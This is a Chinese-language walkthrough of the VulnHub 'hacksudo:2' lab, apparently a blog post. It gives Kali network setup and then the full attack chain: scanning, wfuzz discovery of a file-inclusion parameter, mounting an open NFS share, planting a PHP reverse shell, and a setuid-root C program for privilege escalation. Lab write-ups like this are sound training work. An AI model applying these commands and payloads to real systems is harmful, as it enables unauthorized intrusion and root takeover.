hacksudo:2 (HackDudo) vulnhub靶场(NFS,vbox靶场环境配置)
kali1攻击机ip:192.168.181.129
kali2攻击机ip:192.168.56.107
目录
- 靶场及kali网络配置
- 靶场通关
靶场及kali网络配置
需要把靶机导入vbox才能有ip
下载地址: vbox下载
我的虚拟机原本配置是:kali机仅开启一个网络适配器,eth0,为nat模式,而且设置了静态ip
在hackable1中,我修改了网络配置
虚拟网络编辑器设置如下
kali再添加一个网络适配器,eth1,并设置为桥接模式
vbox靶机网络配置如下
这样一来,靶机就有一个ip了
kali的eth1和靶机eth0就在同一个网络了,可以互相通信
这样配置短时间可以,但是后面我发现,把kali挂起了一个晚上,第二天恢复状态后发现我的静态ip被修改了,不知道是不是因为多了个网络适配器的原因
而且如果要反弹shell,监听端口开启是在kali默认的eth0端口上,两个eth0的ip不在同一个网络中,因为网络隔离的存在,一般情况下无法连接成功(反正我不会搞)
所以在打hackable2的过程中,使用原kali打了一半之后,最后还是选择再安装一个kali2=_=
所以我推荐之间在一开始就把kali网络配置好,我的配置如下,仅供参考
靶机和虚拟网络编辑器的配置和上述一致
kali2配置,nat模式使用dhcp分配ip,具体ip信息文章里有介绍
好了,配置部分结束,开始打靶机
靶场通关
这部分是使用的是原kali
主机发现,指定网卡扫描
arp-scan -I eth1 -l
端口扫描
nmap -sS -p- -T5 -A 192.168.56.105
开启了80端口http服务,1337ssh服务,2049nfs服务;
目录扫描
dirb http://192.168.56.105
上面的文件我全翻了一遍,有图片有歌,就是没啥有用的
加上后缀再扫一次
dirb http://192.168.56.105 -X .txt,.php
扫出来一个file.php
上面飘着一行字,显示有文件包含,很可能就是这个url跟着某个参数
wfuzz探测一下
wfuzz --hw 14 -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -u http://192.168.56.105/file.php?FUZZ
啥也没有,而且全返回200,证明很大可能单FUZZ一个参数回显没有变化,需要包含一个正确文件返回才能有不同回显
尝试包含一个存在的文件
wfuzz --hw 14 -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -u http://192.168.56.105/file.php?FUZZ=../.
./../etc/passwd
成功测试出参数file
有文件包含漏洞了,现在需要找一个上传文件的地方
nmap扫出来靶机开启了nfs
NFS
NFS是一种基于TCP/IP 传输的网络文件系统协议。通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源
在Centos 7系统中,需要安装nfs-utils、 rpcbind
软件包来提供NFS共享服务,前者用于NFS共享发布和访问,后者用于RPC支持。
NFS服务器可以让PC将网络中的NFS服务器共享的目录挂载到本地端的文件系统中,而在本地端的系统中来看,那个远程主机的目录就好像是自己的一个磁盘分区
查看服务器发布的NFS共享目录
showmount -e 192.168.56.105
/将NFS服务端192.168.56.105下的共享目录/mnt/nfs挂载到本机的nfs下
mount -t nfs 192.168.56.105:/mnt/nfs ./nfs
进入nfs目录就能查看共享目录里发布的文件了
尝试上传反弹shell,这里我使用的是msf生成的反弹shell
cp /home/user/myshell/shell.php ./shell.php
赋予文件最高权限
chmod 777 shell.php
没成功,甚至一点反应都没有;
换个反弹shell脚本试试,使用kali自带的反弹shell脚本
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
这里要修改为kali的ip和nc监听的端口
不然就会出现这个报错
WARNING: Failed to daemonise. This is quite common and not fatal.Connection refused (111)
还是不行,原来是因为kali和靶机不在同一个网络里面;
路由器具有防火墙,会阻止所有传入连接(但是听说可以启用转发,不知道仅主机模式可不可以,我现在还搞不定,先放一放),我真是把所有坑踩了个遍=_=
最后没办法了,我就重新弄了一台kali的虚拟机(kali2),eth0为桥接网卡,这样默认ip就是192.168.56.0/24网段的了
(要是网卡没有ip可以试试执行/sbin/dhclient
)
在kali2里面打开nc监听
浏览器重新访问 http://192.168.56.105/file.php?file=../../../../mnt/nfs/shell.php
终于连上了
弄个回显 python3 -c 'import pty;pty.spawn("/bin/bash")'\;
既然可以上传文件,那我们直接上传提权文件就好了
写一个c语言提权脚本
#include<stdlib.h>
#include<unistd.h>int main()
{setuid(0);
system("id");
system("/bin/bash");
}
编译
gcc getroot.c -o getroot
chmod 777 getroot
加上suid权限
chmod +s getroot
进入/mnt/nfs
目录./getroot
执行提权代码
成功提权,得到flag
o了
hacksudo:2 (HackDudo) vulnhub靶场(NFS,vbox靶场环境配置)相关推荐
- VulnHub渗透测试实战靶场 - Odin:1
VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...
- VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 环境下载 戳此进行 ...
- VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...
- VulnHub渗透测试实战靶场-HA: FORENSICS
VulnHub渗透测试实战靶场-HA: FORENSICS 题目描述 环境下载 HA: FORENSICS靶机搭建 渗透测试 信息搜集 Flag获取 Flag-1 Flag-2 Flag-3 Flag ...
- VulnHub渗透测试实战靶场笔记(持续更新)
靶机(一)----Breach1.0 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网 ...
- 红队渗透靶场之W1R3S靶场(超详细!)
W1R3S考察知识 nmap的基本使用 目录爆破工具的使用 CMS漏洞的利用 Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub. ...
- CTFweb相关靶场推荐与环境配置
ps:国庆假期少事情多就不更新了 今天来一波猛的 想起来没有给大家推荐过实战的平台 今天来安利一波 这篇很长 相比上一篇sqlmap的配置而言内容很多 有问题的小伙伴欢迎留言哦 在线练习平台 bugk ...
- 使用APMServ搭建DVWA靶场、sqli-labs靶场——超详细
文章目录 前言 一.搭建环境(APMServ) 1.安装APMServ 2.配置MySQL数据库 ①管理msyql数据库 ②登录(默认密码为空) ③选择mysql数据库 ④执行sql语句 ⑤重启APM ...
- linux ubuntu 安装samba ftp nfs tftp,Ubuntu配置TFTP和NFS和samba服务配置.doc
Ubuntu配置TFTP和NFS和samba服务配置 配置tftp服务的步骤: 1.安装相关软件包:tftpd(服务端),tftp(客户端),xinetd sudo apt-get install t ...
最新文章
- 牛逼,国产开源的远程桌面火了,只有9MB,支持自建中继器!
- 学 JavaScript 伤不起……| 每日趣闻
- Sql Server截断日志(转)
- HIVE的安装配置、mysql的安装、hive创建表、创建分区、修改表等内容、hive beeline使用、HIVE的四种数据导入方式、使用Java代码执行hive的sql命令
- latex绘图笔记(一)
- 浪潮世科和浪潮软件什么关系_社交图形浪潮
- html适配Anroid手机
- 代替嵌套循环java_蓝石榴_个人博客_Java中for循环嵌套的替换优化
- 架构师进阶:Linux进程间如何共享内存?
- PHP学习笔记1:基础知识快速浏览
- 三菱伺服驱动器说明书_张家港市HG-KN13J-S100三菱伺服控制器
- zebradesigner2教程_zebradesigner pro 2中文版-斑马条码打印机软件下载 附带安装教程 - 安下载...
- 猿创征文|2022全球程序员薪资排行一览
- SylixOS学习二—— SylixOS启程之旅_SylixOS 系统概览
- 前端有哪些好的学习网站?
- fir滤波器算法c语言程序,FIR滤波器C语言代码
- 从零开始 | 原生微信小程序开发(二)
- 切绳子(二分,c语言)
- element布局容器大小_element中el-container容器与div布局区分详解
- 北京最大废品集散地面临拆迁 曾登上时代周刊
热门文章
- H264的基本原理(二)------ H264编码原理
- 图像处理中几何畸变校正,图像纠正的方法有哪些
- 【sass】安装及入门教程
- wordpress移动_如何在移动设备上隐藏WordPress小部件(易于初学者使用)
- Ceres求解直接法BA实现自动求导
- 解决k8s Error registering network: failed to acquire lease: node “master“ pod cidr not assigne
- 2021年熔化焊接与热切割试题及解析及熔化焊接与热切割模拟考试题
- 杆单元四节点MATLAB,平面四节点等参单元matlab实现
- 【QCA6174】SDX12 WiFi QCA6174 bdwlan30.bin和bdwlan30.txt相互转化操作说明
- 微软首款内置中文Cortana智能手机大陆上市